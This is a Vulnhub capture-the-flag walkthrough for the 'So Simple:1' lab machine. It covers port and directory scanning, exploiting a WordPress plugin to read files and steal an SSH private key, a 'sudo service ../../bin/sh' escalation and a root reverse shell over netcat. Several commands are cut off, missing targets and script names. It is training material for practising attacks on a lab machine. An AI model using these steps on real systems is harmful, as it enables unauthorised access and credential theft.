So Simple:1 - Walkthrough [Vulnhub]
Here's my solution for So Simple:1.
The machine can be downloaded from here.
Scanning for all TCP ports.
nmap -sC -sV -p-
nmap -sC -sV -p-
Directory Scan
Browsing the web, and checking the source did not reveal any hint.
Using dirb to scan for directories.
We get a /wordpress directory.
Using wpscan to enumerate all plugins.
wpscan --url -e ap
We find an exploit for the plugin- social warfare, lets get this
To run the exploit, we create a file named as- exploit.txt, which contains the payload, and we host it on local machine.
We run the exploit.
python -t --payload-uri=
By reading the contents, we find 2 users- max and steven.
Now lets change the payload in exploit.txt file, to get the private ssh key of the user- max.
Again we run the exploit.
We copy the ssh key to a file named as- key.
Getting Access
Before accessing, lets change the permission of ssh key file named as- key.
chmod 600 key
ssh -i key max@
User Flag.
Privilege Escalation
From Max > Steven.
We see that we can execute service command as user- steven.sudo -u steven service ../../bin/sh
User2 Flag.
From Steven > Root
We see that we can run /opt/tools/ file as user- root.
Navigate to /opt directory, create a directory- tools, under this directory create a file and name it as
We place the payload in file and give an execute permission to it.
Lets run this file as user- root, and on the other hand we start the netcat listener.
We have a reverse shell.
Root Flag.
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